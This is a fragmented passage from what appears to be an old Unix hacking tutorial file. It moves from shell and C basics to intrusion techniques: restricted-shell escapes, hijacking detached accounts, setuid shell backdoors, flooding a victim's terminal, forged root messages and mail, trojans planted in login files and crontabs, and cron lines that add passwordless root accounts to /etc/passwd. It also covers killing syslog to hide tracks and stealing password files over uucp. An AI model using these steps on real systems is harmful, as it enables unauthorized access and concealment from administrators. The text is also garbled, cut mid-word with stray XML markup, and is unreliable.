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Unix Use and Security From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The Ground Up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by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The Prophet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x operating system is one of the most heavily used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today. It runs on many different computers (Dec VAX's, AT&amp;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x series, PDP-11's, and just about any other you can think of-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), and there are many different, but pretty much similar, versions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nix clones go by many different names- here are the most common: Xe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ix, Ros, IX/370 (for the IBM 370), PCIX (for the IBM PC), and Berkely (BS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. This file will concentrate on AT&amp;T System V Unix,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used version. (The next most heavily used is Berkely Unix.)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ver just about everything all but THE most advanced hacker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the Unix system, from the most rodent information to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techniques. This is the second version of this file, and as I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 or new tricks, I will update it. This file is, to the be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totally accurate, however, and the techniques in it will work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herein. Note, that these techniques will work on System V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ily all, but most, should work on most other versions of Uni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Later, if this file is received well, and there is demand for anoth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lease a file on yet more advanced techniques. If you wish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several ways. First, on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pawn   219-659-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201-366-4431 (As prophet, not The Prophet...some rodent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         312-528-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g 13      215-657-8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Klass 2600 806-799-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is voice messa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556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any suggestions, corrections, or feedback of any kind. And la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for [of course] informational purposes only. &lt;Snicker&gt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responsibility for anything anyone does afte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X SYSTEMS AND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nix system can easily be identified by its prompts.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a Unix system, you should receive the login prompt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in:" (Note, that the first character may or may not be capitalized.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, this prompt may be ";Login:" or "User:" (Again,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be capitalized.) This may be preceded by a short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something like "WARNING!!! This system is for authoriz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"), the name of the company that owns the system, or the uucp networ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. (The uucp facilities will be explained in detail later.)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should enter the user name and press return. (You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if your terminal supports it.) You should then receiv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"Password:" (And yet again, the "P" may or may not be capitalized.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you should enter your password and press return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 correct username/password pair, you will then be admit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If you have entered a non-existant username or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you will receive the message "Login incorrect" and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gin prompt. There is little information given before login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find valid usernames from pre-log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"default" passwords in Unix. When the system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, none of the default accounts or any of the account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has a password, until the system operator or the account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ne for the account. Often, lazy system operators and unwary use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to password many (and in some cases, all) of these accounts. To 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 account that doesn't have a password, you have only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 at the login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ncounter some occasional error messages when attempting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der certain accounts. Here are some of the more common messages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"Unable to change directory to /usr/whatever"-This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's home directory, the directory which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logon, does not exist. On some systems, this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rom logging under that account,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ogin prompt. On other systems, you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root directory. If this is the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message "Changing directory to '/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"No shell"-this means that the account's shell,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 does not exist. On some systems, the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llowed to log in, and you will be returned t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 On other systems, the account will be admit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using a default shell, usually the Bourne shell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will be explained later.) If this is the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message "Using /bin/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types of Unix accounts-user and superuser accounts.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re the normal user accounts. These accounts have no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user accounts are the system operator accounts. These accounts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, and are not bound by the file and directory protection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In Unix, there is no hierarchy of privileges-either an account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, or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 usernames are up to 14 characters long, but usually a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1-8. The usernames can contain almost any characte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pecial characters. (The accounts will usually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@, control-d, control-j, or control-x, as these charac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eanings to the Unix operating system.) The Unix system come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with quite a few default accounts, some of which are super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ich are only user-level accounts. Here is a list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hich usually have superuser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unt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account is always present on the system, and always has super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(Note: most Unix System V systems come initially set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feature that prevents superuser accounts from logging in remote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tempt to log in under a superuser account remotely on a syste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you will receive the message "Not on console", and will be re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ssion to the operating system. This will NOT prevent you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user accounts remotely-you simply have to log in under a user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tch over to a superuser account using the su utility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user-level defaul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 account, although it is only a user account, is particularly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has ownership of many of the system's important directorie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are the only default accounts on System V Unix,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counts which I have found to be common to many Unix systems.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accounts I have found on many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     admin           user            demo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unix            guest           pub       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 games           general         student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             tty             lp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ry variations on the account names, such as rjE, rje2, user1, use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so, try variations on people's names and initials, such as doej,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johnd, jj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matter what the format for the usernames, one thing is comm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-almost all of the usernames will begin with a lowercase letter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reason for this-when logging into the system,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name you type in is in uppr-case, the system automatically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terminal does not support lower-case. It will then send all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upper-case, with characters that are supposed to be upper-cas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ackslash ("\", the Unix escape character), to differentiat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are meant to be in lower-case. Unix *always* different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ses, so it is best to stay in lower-case wh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entioned before, there are no "default" passwords on Unix.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created, it has no password, until the superuser or the accou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sets one for it. Unix passwords are a maximum of 11 charac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contain any character, and the system distinguishes betwee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case characters. Many Unix systems implement a spe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under which passwords must contain at least 2 non-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similar to Compuserve's password protection). Yet anoth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feature of Unix allows the superuser to set an expiration d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ystems have accounts known as "command logins"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log in, execute a single command, and are then logged ou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arely have passwords. Here is a list of common command lo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-This is a particularly useful command login. When you enter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name of a system with this particular account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list of the users currently on the system. A good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ernames to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-Not very useful. Just display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-Ditto the above, but displays the current date. Great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   -This default account is sometimes set up as a command login.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sync command, which causes any data which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x operating system interprets certain characters i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Provided here is a list of those special characters, and their mea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x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       -This is the Unix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J       -Some systems interpret this, rather than Control-M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character, while others may use both. The vast majo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will only use Contro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Delete  -This is the Unix kill character. It will automaticall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-Some systems use this as the k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     -This is the Unix escape character. Its mai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iate between upper- and lower-case charac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ed in on a terminal that only supports upper-ca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if you wanted to send the command "cd /Mrs/d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ver mind what it does right now), you woul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how it would look on your upper-case only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\MR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ckslash before the M would let the system know that th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sed to be upper-case, while the others would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d a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acters will rarely be used in usernames and password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y they are interpreted. Note, however, that these values may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once inside the system using the stty command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later. for instance, the end of file character c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f you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x shell is the command interpreter program that accep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carries out your commands. It is NOT the operating system itsel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nterface between the user and the operating system. The she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s executed when you are logged in, and when you end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are logged out of the system. There is nothing special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-it is just a regular program, like any other on the Uni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once you are logged on, you can execute another shell ju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ecute a program. This ability, to run multiple shell level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erform some interesting tricks that will be detail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re is also more than one kind of shell. All the shells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asic function of interpreting the user's commands, but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. Here is a list of the different shells, their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and how to tell which shell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-This is the Bourne shell, the standard shell of Unix System V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cus of this file. This shell gives user-level account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f "$", and "#" for superuser accounts. On Berkely BSD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ell gives an ampersand ("&amp;"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h     -This is the C shell, developed by the Berkely University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. This shell is pretty much the same as the Bourne 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different shell programming control structures [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will be explained later, in the section on Un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], and has a few luxuries such as aliasing (giv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series of commands a new name), and it keeps a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you enter. This shell gives a "%" prompt for user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#" prompt for superuser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h     -This is the new, Korn shell. This shell combines features of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rne shell and the C shell. It boasts the Bourne shell's easi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along with the C shell's aliasing and history. I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$" for users and "#" for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   -This is the restricted Bourne shell. It is used for accou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user wishes to restrict the commands available to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xecute commands outside of your searchpath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ed later, also, in the section on software developm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et you change directories or change the values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In all other respects, it is similar to the Bourne she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section of this file will detail ways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f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      -This is a lousy, menu-driven shell for the AT&amp;T Unix PC. (Y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of those with dialups!) It implements a lous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is SLOOOW, even at 2400 baud. Luckily, you can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rne shell from the u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by no means all of the shells you will run acros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"official" shells provided by the distributors of the Unix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've run across many "home-made" shells in my time. Also, an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used as a shell. For instance, I've used systems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where one account logged in using an accounting program as a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ed the account from being used to do anything other th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program. Other good examples of this are the command logins-t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ogin, for example, uses the who program as its shell.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ished, the account is logged out. You will most definitely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accounts as you hack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files and directories are referenced with pathnames, a la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MS-DOs, then you should have no problem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. Unix files and directories are referenced in the almost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-the only difference is that it uses the "/" character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to separate the directories in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names are a simple concept to understand, but a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. Imagine the system's files and directories laid out in a tree fash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(dir)              bill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:     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k (file)  source (dir)  memo (file)  names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" is the root directory. This is the top directory in the system t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files and directories are referenced in relation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has 2 subdirectories in it, "usr" and "bill". In the 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re is a file called "junk" and an empty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urce". In the directory bill, there are 2 files, "memo" and "nam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pathnames by starting at the top of the system, "/", and tra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wn the system tree to the file or directory you wish to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each directory you must pass through to get to it with a slas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pathname of the file "junk" would be "/usr/junk". The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r directory would be "/usr". The pathname of the source director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/usr/source". The pathname of the bill directory would be "/bill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 of the 2 files which reside in it would be "/bill/mem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bill/n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irectories can also be referenced by their base nam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 your current directory. For instance, if you wer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r", you could reference the file "/usr/junk" by its base name, "junk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in the root directory, you could reference the bill direct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, "bill". You can reference the file directly abo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he system tree as ".." and your current direc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s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file and directory names can be up to 14 characters in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contain any ASCII character, including control charact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It may contain both upper- and lower-case, and Unix does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. Unix does not use filename extensions, a la VMS or MS-DO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kind of file a file is. A period, in Unix, is just an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name, not a separator between 2 fields in the name. File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a period are called "hidden" files-that is, they are only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a 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kinds of files in Unix. These are text files,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files. Text files are just what you'd think they are from the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SCII text, just like what you're reading right now.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machine-code files. (There are also executable text files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s, that will be explained in detail in the section on Unix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) Device files are files that represent the system's I/O devi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, terminals, etc. Remember, that Unix was created as an envir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ftware development. Its designers wished for programs written fo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be as transportable between different models of machin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as possible. By representing the I/O devices a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liminated the incompatability in the code that handled I/O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as to read and write from/to the file, and the Unix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system-depend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will describe some basic Unix commands, and detail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rther help on-line. It will briefly provide the syntax for a few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necessary to know in order to find your way aroun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 will usually only require that you use the base name o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wish to reference if it is in the directory you are currently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will also let you specify full pathnames if you wish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ther parts of the system. Most commands will also let you u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when referencing files and directori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-This means to accept any single character in the place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. For instance, "t?m" would include both "tom" and "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This means to accept any character, group of characters, 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the asterisk. For example, "t*m" would include "th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m", and "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    -This means to accept any character within the brackets in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brackets. For instance, "t[oia]m" would include "tom", "ti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tam". You can also specify a range of characters in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a hyphen. For instance, "t[a-c]m" would include "tam", "t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t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mands and programs in Unix take their input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their output to the screen. With most commands and program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ruct them to draw their input from a text file and redire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nother file instead. For instance, assume there is a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ed "encrypter", that takes its input from the keyboard, encrypt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the encrypted data on the screen. You could instruc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its input, instead, from a previously prepared text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direction character, "&lt;". In Unix, as in MS-DOs (which is based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), you execute a program by typing its name. You wish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s input from a file in the directory you are currently i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_secret". You would type "encrypter &lt; top_secret". The program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the contents of the file top_secret and encrypt it, then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form on the screen. Suppose you wanted to use the encryp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rypt files you wished to keep private? You could redirect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screen into another file. To do this, you would us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character, "&gt;". Say, you wished to save the output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vate". You would type "encrypter &lt; top_secret &gt; private". The encry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then read in the contents of the file top_secret and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output into the file "private". Nothing would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the file private does not exist, it will be created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isted, its contents will be erased and replaced with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ncrypter program. Perhaps you would want to add to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ather than replace its contents? This is done with "&gt;&gt;"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crypter &lt; top_secret &gt;&gt; private" would append the output from the encry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contents of the file private. Again, if the file privat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mands have one or more options that you can specify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fter the command itself in the command line, and preceded by a hyp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let's say that the encrypter program had an op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", which caused it to use a different encoding algorithm.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by typing "encrypter -x". If a command has two or mor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ually specify one or more together in a stream. For instance,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crypter program has 2 options, x and y. You could specify bot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"encrypter -xy". If one or more of the options requires an argumen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e x option requires a 2 character key, you can specify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, like this: "encrypter -xaa -y", where aa is the 2-charac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pe character, "\", is used to channel the output of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gram into the input of another. For instance, suppose you had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report" that formatted documents into report format, and you h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yreport" that you wished to view in the report format.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 myreport" \ report". This would type out the contents of the file my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port command rather than the screen, and the report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t and display it on the screen. (Note: this example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I/O redirection by typing "report &lt; myreport"...but it mak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se of pi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oose to execute commands and programs in the background-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 command executes, but you are free to carry out other tas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. To do this, type in the command line, followed by " &amp;"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 * &amp;" would delete all the files in the directory, but your termin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tied up. You would still be free to perform other tasks.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 system will print out a number and then return you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is number is the process number of the command. Process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lained later in this section in the entry for the command "ps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be stopped before its completion with the kill comman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se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rm *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use background processing, the command or program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its input from the keyboard (standard input device) and send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 (standard output device), so if you wish for the comman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ground without disturbing you, you must redirect its input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output (if it's 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     -This command lists the files and subdirectories in a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type "ls", it will display the files in your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pecify the pathname of another directory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s in it. It will not display hidden files (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begins with a peri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-This option will display all files, includ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.      junk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-This is the command used to move from one directory to another.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rectory directly below your current directory, type "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irname&gt;". To move up to the directory directly abo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type "cd .."  You can also jump to any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rom any other directory in the system by specifying th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irectory you wish to go to, such as "cd /usr/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d /usr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d     -This prints out the pathname of the directory you are currently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forget where you're at in the syste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    -Displays the contents of a text file on the screen. The correct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cat &lt;filename&gt;". You can use basenames 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a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feed the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-This deletes a file. Syntax: "rm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rm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-Copies a file. Syntax: "cp filE file2", where filE i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copy, and file2 is the name of the copy you wish to creat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2 already exists, it will be overwritten. You may specify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or bo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p /usr/junk /usr/junk.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ty    -Displays/sets your terminal characteristics. To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type "stty". To change a setting, specify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       -System echoes back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cho       -System doesn't ech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 'arg'   -Sets the break character. The format is '^c' for control-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'' means no brea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'arg'  -Sets the backspace character. Format is '^h' for contro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'' means no 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'arg'   -Sets the kill character (which means to ignor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yped). Format is the same as for intr and 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^[character]', with '' meaning no k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ty intr '^c' erase '^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y -echo intr '^c' erase '^h' kill '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     -This command prints out a file on the Unix system's printer,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op by and pick up (if you dare!) The format is "lpr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p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    -This is a text file line editor. The format is "edit &lt;filename&gt;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ish to modify is not modified directly by the editor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into a buffer instead, and the changes are only mad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a write command. If the file you are editing doe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it will be created as soon as issue the first wri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issue the edit command, you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, ":" Here is where you issue the various command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st of some of the basic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    -This is any number, such as 1, 2, etc. This will move you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at line of the file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This deletes the line you are currently at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the previous line, whi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-Begin adding lines to the file, just after the li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urrently on. This command will put you in the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Simply type in the text you wish to add.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ode, type return to get to an empty lin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eak key (which is whatever character you have s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eak key). It is important to set the break charac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ty before you use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-Searches for a pattern in the file. For example, "/junk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e file from your current line down fo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ontains the string "junk", and will move you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f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-Insert. Works similar to a, except that the tex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line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-Prints out a line or lines in the buffer. "p"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your current line. "#p" will display the line "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specify a range of lines, such as "1,3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lines 1-3. "1,$p" will print ou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-Write the changes in the buff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-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dit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"myfile" [new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lines, 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dding stupid text to m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[this is assumed as a default break character in this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,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dding stupid text to m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dding stupid text to m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-this command searches for strings of text in text files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p [string] [file]. It will print out every line in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tring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-Invert. This will print out every line that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rep you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're going to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-This will show the users currently logged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   console Mar 10 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   contty  Mar 30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   tty03   Mar 30  1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to explain the above output: the first field is the user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. The second field shows which terminal the accoun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is, always, the system console itself. On many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ly one dialup line, the terminal for that li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tty. the tty## terminals can usually be either dial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erminals. The last fields show the date and tim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n. In the example above, let's assume that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is March 30, and the time is 1:00. Notice that the time is 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format. Now, notice that the root (superuser) account logg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0! Some systems leave the root account logged in all th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. So, if this is done on a system you are using, how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if the system operator is really online or not? Use the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-This command displays information about system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-this displays information on a specific user's proce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to display the root account's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ps -u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D     TTY     TIME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4    console 01:00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75    ?       00:00  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87    console 13:00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80    tty09   12:03  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to explain that: The first field is the proces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nd every time you start a processes, runn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sueing a command, etc., that process is assigned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The second is which terminal the process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The third field is when the process was starte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the base name of the program or command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's lowest process number is his login (shell)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the lowerst process in the above example is 1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ss is being run on the console tty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user is logged on at the system console. Note the ?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y in the next entry, for the cron process. You can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with a question mark as the terminal. The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bewing carried out by a user; they are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y the system under that user's id. Next, no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ocess # 1687, on the console terminal, "who"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uperuser is executing the who command...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is currently actively on-line. The next entry is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g...it shows that the root user has a shell proc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tty09! This means that someone else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root account, on tty09. If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n account, this option will display inform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m, unless you specify the next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-This allows you to select processes run on a specific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s -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how all the processes currently being run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options can usually be combined. This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t user's processes being run on th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ps -uroot -t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D     TTY     TIME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4    console 01:00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87    console 13:00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-Kills processes. Syntax: kill [-#] process#. You must know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kill it. You can, optionally, specify an option of 1-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power of the kill command. Certain kinds of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hell processes, require more power to kill. Kill -9 will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You must have superuser capabilities fo kill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(unless he's using your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kill -9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-This command is for on-line realtime user to user communicatio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with a user, type "write &lt;username&gt;"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s logged in under that user name, you must specif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you wish to speak to. When you do this, the pers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unicate with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[your account name] tty## [&lt;--your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type messages, and they will be displayed on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when you press return. When you are finished, press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writ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 you I'm a hacker!  [This is not advi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   -The Unix mail facilities, used to send/receive mail. To sen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mail &lt;username&gt;". Enter your message and press control-d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your mail, type "mail". Your first lette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you will be given a "?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the legal commands you give at this po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 -Read mess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Delete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-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-Move back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-Send mail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Save last message read. You can specify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ich it is saved, or it will be saved to the defaul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-Same as s, but will save the message without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-Exit without deleting messages that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-Exit, deleting messages that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-Print last message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-List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a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bill! This is a n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ohn Thu Mar 13 02:00:00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bill! This is a n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  -This is the Unix file encryption utility. Type "crypt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the password. You then enter the text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rypted when you press return, and the encrypted for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So, to encrypt a file, you must use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crypt [password] &lt; [filE] &gt; [file2]". This will encryp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s of filE and place the encrypted output in file2. If file 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-This is the command used to change the password of an ac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"passwd &lt;account&gt;". You must have superuser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assword for any account other than the one you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der. To change the password of the accoun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simply type "passwd". You will then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ssword. Next, you will be asked to enter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be asked to verify the new password. If you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assword correctly, the password change will be complete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stems use a security feature which forces you to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on-alphanumeric characters in the password. If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you are on, you will be informed so if you tr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ssword that does not contain at least 2 non-alphanumer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     -This command is used to temporarily assume the id of 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"su &lt;account&gt;". If you don't specify an acc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oot is assumed. If the account has no password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account's identity. If it does have a passwo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it. Beware of hacking passwords like thi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keeps a log of all attempted uses, both successful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and which account you attempt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-This command creates a directory. the format is "mkdir &lt;dir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-This command deletes a directory. The directory must be empt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"rmdir &lt;dir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-Renames a file. The syntax is "mv [oldname] [newname]"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, but the new name must have the same path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name, except for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help can usually be gained from the system itself. Mos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n-line entries from the Unix System User's Manual. You can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using the man command. The format is "man &lt;command&gt;". Some Uni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systems also feature a menu-driven help facility. Simply type "hel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t. This one will provide you with a list of commands, as well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entries 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AND DIRECTORY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Unix account is assigned a specific user number, and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is is how the system identifies the user. Therefore, 2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usernames but the same user number would be considered b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same id. These user and group numbers are what Unix use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 has three different file/directory permissions: read, wr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This how these permissions affect access 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-Allows a user to view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-Allows a user to change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-Allows a user to execute a file (if it is an executable type o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n't, the user will get an error when trying to execu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se permissions affect access t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-Allows a user to list out the files in a directory (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-Allows a user to save and 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-If a user has execute access to a directory, he can go to tha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with the cd command. If he also has read permission to tha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tory, he can also copy files from it and gain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s for that directory and the files it contains, with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the ls command, which will be explain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divides users into 3 classes: user (the owner of the file o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ory), group (members of the owner's group), and other (anyone who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to the first two classes). You can specify what permissions to gi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class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how the permissions of the files in a directory, use "ls -l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st the contents of the directory (as in ls), and will show ea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xrwxrwx   1   bin      sys 12345   Mar 10  01:30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xr-xr--   1   guest  users   256   Mar 20  02:25   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, the directory we are in contains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in and a file called "startrek". Here is an explantion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 contains the file's type and permissions. Look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first line, "drwxrwxrwx". Note the "d" at the begginning. The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" at the begginging of the first field for the file startrek. Thi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. "D" is a directory. "-" is a file. "c" is a device file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first field of the first line again. Notice the "rwxrwxrwx"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ermissions. The permissions are divided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ser][group][other]. R stands for read, w stands for write, and x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"rwxrwxrwx" means that all three classes of users, owner, gro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have read, write, and execute permissions to the directory bin.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econd line. It reads "rwxr-xr--". Notice the "-"'s in the plac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missions. This means that the file was not given tha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shows that the owner has read, write, and execute permis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artrek, members of the owner's group have read and execut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write (notice the "-" in the place of the group part's w)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have only read privileges ("r--"...there are hyphens in the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part's w and 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let's look at the other fields. The second field is a numbe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number is one for each line). This shows the number of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on the system. The third field shows the name of the owner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directory). The fourth field shows the username of the owner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field, which is not shown on some systems, show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group.The sixth field shows the size of the file. the sevent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time and date the file was last modified. the last field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used to change file/directory permissions is chmo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ways to change permissions: symbolically and absolutely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hange permissions symbolically, only the permiss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o be added or deleted will be changed. The other permis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y ar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[u, g, or o] [+ or -] [rwx] [file/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-User (the file or directory's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-Group (members of the owner'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-Others (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Rea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-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-Execu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u, g, and o to specify which group you wish to change the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To add a permission, type "chown [class]+[permissions] [filename]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o add group write permissions to the file startrek, type "chown g+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rek". To delete permissions, use the "-". For instance,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write access to the file "startrek", type "chown u-w star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t file permissions absolutely, any permissions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 the file or directory are automatically deleted.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ermissions absolutely is "chown [mode number] filename". You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number by adding together the code numbers for the permiss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he file. Here are the permissions and thei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execute permission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rite permission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ad permission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xecute permission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rite permission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ead permission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(owner) execute permissi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owner) write permission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owner) read permission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lso two special file modes that can be set only absolu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UID and GID modes. The UID mode, when applied to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eans that when another user executes the file, he executes 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umber of the owner (in other words, he runs the program as if he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the file). If the file has its GID mode bit set, then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file, his group will temporarily be changed to that of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. The permission number for the GID mode is 2000, and the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D mode is 4000. If the uid bit is set, there will be an "S" in the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 the owner permissions section when you check a file's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Sr-xr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id bit is set, and the owner of the file has execute permissions,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sr-xr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id bit is set, the same applies to the x in the section on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ort note here is in order on how these permissions affect super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They don't-unless the owner of the file is root. All super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have the same user number, which means that the system consider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 be the same-that is, they are considered to be the root account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user accounts are only bound by the protections of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own, and they can easily change the permissions of an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they do not have the access to that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will detail the purposes of some files that ar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tems. There are quite a few of these, and knowing their uses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ir entries are in is very useful to the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passwd     -This is the password file, and is THE singl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the system. This file is whe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's accounts are stored. Each entry has 7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name:password:user#:group#:description:home dir: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eld, naturally, is the account's user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field is the account's password (in an encrypte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field is blank, the account doesn't have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field is the account's user number.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account's group number. The fifth field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account. This field is us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file, and is often just left blank, as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ce. The sixth field is the pathname of the acco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me directory, and the last field is the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's shell program. Sometimes you may see an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besides the standard shell programs (sh, cs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its shell program. These are "command logins"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 execute these programs when logging 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who" command login would have the /bin/who program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typical-look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:hGBfdJYhdhflK:0:1:Superuser:/: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entry is for the root account. Notice that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of the password is 13 characters, yet the Unix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nly 11 characters maximum. The last 2 character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 a "salt string", and are used i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, which will be explained in more detail later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e user number, which is zero. Any account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0 has superuser capabilities. The group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ount description is "superuser". The account's hom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tory is the root directory, or "/". The account's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urne shell (sh), which is kept in the directory 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you may see an entry in the password fiel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HFfnldyNjh,21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e comma after the 13th character, follow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 and 2 letters. If an account has an entry lik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as a fixed expiration date on its passwor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, in this case 2, shows the maximum number of wee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ount can keep the same password. The second dig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many weeks must pass before the account can chan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(This is to prevent users from using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onstantly by changing the password when forc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hanging it back immediately.) The last 2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ncrypted form of when the password was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nusual password field entries you might encoun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,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entry means that the account has no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entry means that the account has no password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fixed expiration date that will begin as soon as a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is giv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, for an explanation of how the Unix system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s. The first thing any hacker thinks of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ypt the password file. This is as close to im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gets in this world. I've often heard other "h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g about doing this...this is the biggest lie since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"I did it". The encryption scheme is a vari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(Data Encryption Standard). When you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d (to change the password), the system will form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"salt string" based on the process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ommand you just issued. This 2-character str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ces a slight change in the way the password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total of 4096 different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scheme caused by different salt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the same encryption scheme used by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The password is NEVER decrypted on the sys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og on, the password you enter at the password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ed (the salt string is taken from the passwo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ared to the encrypted entry in the passwor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generates its own key, and as of yet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any way to get the key. The login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encrypt the password you enter itself, it does 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, by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group      -This is the group file. This allows the superus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accounts group access to groups other tha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name:password:group number:user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eld is the name of the group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for the group password. In all my experience with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never seen the password feature used.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's number. The fourth field is a list of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access to this group. (Note: this can include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number is different from the number of the group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you are reading in the group file.) The user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::2:root,sys,adm,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o a new group identity, type "newgrp [group]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oup has a password, you must enter the prop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not change to another group if you are no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of that group in the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console    -This is the device file for the system conso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's ma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##      -The device files for the system's terminals are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tty##, such as tty09, and sometimes ttyaa,ttya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ways to make use of the Unix system's treatment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iles will be explored in the section on Hacking Unix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are not in use by a user (in other words, n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onto this terminal), the file is owned by root.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is logged onto a terminal, however, ownership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file is temporarily transferred to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dk##       -These are the device files for the system'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files     -There are special files that are in a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 commands that are executed when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file depends on what shell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re the names of the files for the various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              .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h             .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h            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h             .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ystems also use a file called ".logout"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hich are executed up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ypes of files are called shell scrip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explained in the section on Unix Software Develop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nation of shel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dm/sulog  -This is a log of all attempted uses of the su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when the attempt was made, what account mad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ccount the user attempted to assume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emp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dm/logi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dm/acct/sum/loginlog- This is a log of all logins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cludes the time and the account's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            -These are files in the home directories of the system'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 all the mail messages that they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mail/&lt;user&gt;        -These files in the directory /usr/mail are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accounts. They contain all the unrea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count they are nam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       -This is the null device file. Anything written to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ost forever. Any attempt to read this fil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mmediate control-D (end of fil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  -The directory /tmp provides storage space for temporary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grams and other processes. This directory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xrwxrwx permissions. Examining these files occasionally revea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information, and if you know what program gener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rmat of the information in the file, you could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in the files, thereby changing the outco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nderstanding of the cron utilities will be necessary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arts of the section on Hacking Unix. This section will give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workings of the cr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n utility is a utility which carries out task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a periodic basis. These tasks, and the times when they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, are kept in files in 2 directories: /usr/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rontab in the directory /usr/lib contains entrie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that must be performed on a periodic basis. The format for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our dayofmonth  monthofyear  dayofweek comma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minutes field. This is a value from 0-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hour field, a value from 0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the day of the month, a value from 1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field is the month of the year, a value from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field is the day of the week, a value from 1-7, with monday be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th field is the pathname and any arguments of the task to b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terisk in a field means to carry out the task for every valu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For instance, an asterisk in the minutes field would mean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 every minute. Here's an example crontab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* * *  /bin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sync command, which is kept in the directory bin, at 1 a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 /usr/lib/crontab are performed with roo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irectory /usr/spool/crontabs, you will find files nam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ccounts. These files contain cron entries which are the same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/usr/lib/crontab, but are carried out under the id of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after. The entries ar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! When modifying cron files- cron activity is logged! All cron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gged in the file /usr/adm/cronlog. I've found, however, that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almost nev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x operating system was initially created as an enviro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ment, and that remains its main use. This section will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s's main facilities for software development, the C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ming, and their related utilities. A few of the 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iefly touched upon at the end of this sectio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ell is more than a simple command interpreter.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programming tool, with variables, control structur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just about any other programming language. Shell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cripts. Scripts are just text files which contain the names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. When the script is executed, the command and programs w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re executed as if you had typed in their names from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execute a shell script: if you have execute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simply type in its name. Otherwise, (if you have read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you can type "sh [filename]". Here is a sample shell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it contains the commands who and whoami. When you execu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list of the system's current users (the output of t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, and which account you are logged in under (the output of the who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oncentrate solely on shell programming. Whil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essentially the same with all the shells, there are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differences that make shell scripts incompatible with shell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specifically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ny programming language, the shell can handle variables.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variab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iable]=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ign the value "1" to the variable counter. If the variabl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lready exist, the shell will create it. Note,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eric" variables in shell programming- all the variables are string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e could la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=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nter would now be equal to "This is a string". There is a comm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r", however, that will let you treat a variable as a numeric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etting the value of a variable, you only use the variab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pecify a variable as an argument to a command or program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cede the variable with a dollar sign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e want to specify user as an argument to the command "ps -u".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u$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, of course, display the processes of the user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ertain vaiables which are already pre-defined by the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special meaning to it. Here is a list of the more important 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 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-(Notice the caps. All pre-defined variables are in all-cap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ontains the pathname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-This is a good time to explain something which makes Unix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operating system. In Unix, there are no commands "built-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. All the commands are just regular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variable contains a list of the pathnames of directori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name of a command or program, the shell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listed in the PATH variable (in the ord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) until it finds a program with the same n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d in. The format for the list of directori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name]:[pathname]:[path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default searchpath is us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n:/usr/bin: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entry in the pathname, or an entry for ".", mean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user is currently in. For instance, all thes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blank or "."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/bin:/usr/bin         [Notice . at begginning of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/bin:/usr/bin          [Notice that path begins with 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n:/usr/bin:          [Note that path ends with :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1     -This variable contains the shell prompt string. The defaul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" ("&amp;" if you're using BSD Unix). If you have the "&amp;"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the dollar sign prompt instead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1=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-This contains the type of terminal you are using. Comm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vt100   vt52    vt200   ascii   tv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tc... Just type "TERM=[termtype]" to set your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variables are variables whose values are set to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 the command line when you execute the shell script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hell script called "repeat" that uses command lin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command prints out the values following it. In this cas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values of the variables $1, $2, and $3. These ar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variables. For instance, $1 contains the value of the first argu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 the command line, $2 contains the second, $3 contains the thir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to infinity. Now, execute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pples pears pe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"repeat" shell scrip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2 special command line variables, $O and $#. $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command you typed in (in the last example, $O would be repeat). $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umber of arguments in the command line. (In the last example, $#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FOR SHE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were added to the Unix os especially fo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is section will list them, their syntax,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-This command reads the value of a variable from the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: "read [variable]". For example, "read number"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receded by a dollar sign when used as an argument to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-This command displays information on the scree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cho hello" would display "hello" on your terminal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as an argument, it must be preceded by a dollar sig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"echo $gree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-This command traps certain events, such as the user being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the break key, and tells what commands to carry o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. The format is: trap "commands" eventcodes. the even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or break key, and 1 for disconnect. You can specify multip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with the quotation marks, separating the commands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(";"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"echo 'hey stupid!'; echo 'don't hit the break key'"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cho "Hey stupid!" and "Don't hit the break key" if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 key while the shell script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-This command terminates the execution of a shell procedure, and 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ns a diagnostic value to the enviroment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 [value]", where value is 0 for true and 1 for false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ue parameter will become clear later,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's provisions for conditional execution. If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xecuted is being executed by another shell script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next highest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WITH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r command allows you to perform arithmetic on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and sends the output to the screen. (Though the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)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[arg] [function] [arg] [function] [arg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arg] may be either a value, or a variable (preceded by a dollar sig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function] is an arithmetic operation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-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      -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-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Remainder from a divi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um1=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m2=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r num1 +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NIPULATION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rt command sorts text by ASCII or numeric value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[field][option]..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 is the file you wish to sort. (The sort command's in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, though, just as its output, which is ordinarily to the screen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) The sort command sorts by the file's fields. If you don't spec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eld, the first field is assumed. for example, sa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names and test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Bo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cKann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bie Kairful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's fields would be first name, last name, and score. So,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 (called "students") by first name, you woul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Bo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bie Kairful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cKann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ort the file's entries by another field, say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"students" (last names), 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+1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1 means to skip ahead one field and then begin sorting. Now, say we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file by the 3rd field (scores). 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+2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2 fields. But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Bo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cKann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bie Kairful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horter names came first, regardless of the num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eld. There is a reason for this- the spaces between the second and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considered to be part of the 3rd field. You can tell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ignore spaces when sorting a field, however, using the b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+2b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another error!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Bo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bie Kairful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cKann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id the value 5 come after 10 and 20? Because the sort command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orting by numeric value- it was sorting by the ASCII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hird field, and 5 comes after the digits 1 and 2.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at the field be treated by its numerical value by specifying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+2n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cKann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Bo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bie Kairful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we use the n option, blanks are automatic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specify that sort work in the reverse order on a fiel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we wanted to sort by last name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+1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cKann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bie Kairful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Bo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pipes, you can direct the output of one sort command to the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sort command, thus allowing you to sort a file b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This makes sort an excellent tool for text manipulation. It i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only one. Remember, you can use any Unix command or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, and there are many different commands for text manipul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, such as grep (described in an earlier section on basic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different commands and ways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/do loop is a simple way to repeat a step for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[variable] in [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precede the variable with a dollar sign in this command. The for/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works by assigning the variable values from the list of values given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var in 1 2 3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cho $loo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ss of the loop, loopvar would be assigned the value 1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ss 2, on the third pass 3, on the fourth pass 5, on the fifth pass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sixth pass 7. I skipped the number 4 to show that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alues in numerical order. In fact, you don't have to us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You could just as easily have assigned loopvar a str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var in apples peaches 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cho "This pass's fruit i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$loo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also specify multiple commands to be carried out in th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EXECUTION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se command allows you to execute commands based on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[variable]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alue])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alue2])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alue3])        ...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$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echo "You have chosen option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This is not a good choice."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echo "Option 2 is a good choice."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     echo "Invalid option.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explai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riable choice's value is "1", the commands in the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1 are carried out until a pair of semicolons (";;") is fou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f the value of choice is "2". Now, note the last entry, "*"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haracter. This means to execute the commands in this secti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lue of choice. Easac signals the end of the list of execu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RUE/FALSE CONDITIONS WI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command tests for various conditions of files an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either a true value (0) or a false value (1), which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ction with the if/then statements to determine whether or not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executed. There are several different formats for test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kind of condition you are testing for. When using variables with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precede the variable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[arG] option [arg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can either be number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TEST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q             arG=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             arG&lt;&gt;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gt             arG&gt;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t             arG&lt;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             arG&gt;=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             arG&lt;=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[option]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TEST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file or directory exists and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    the "file" is a file and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the "file" is real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the user has write permission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the user has read permission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[arG] option [arg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can be either strings of characters or variables 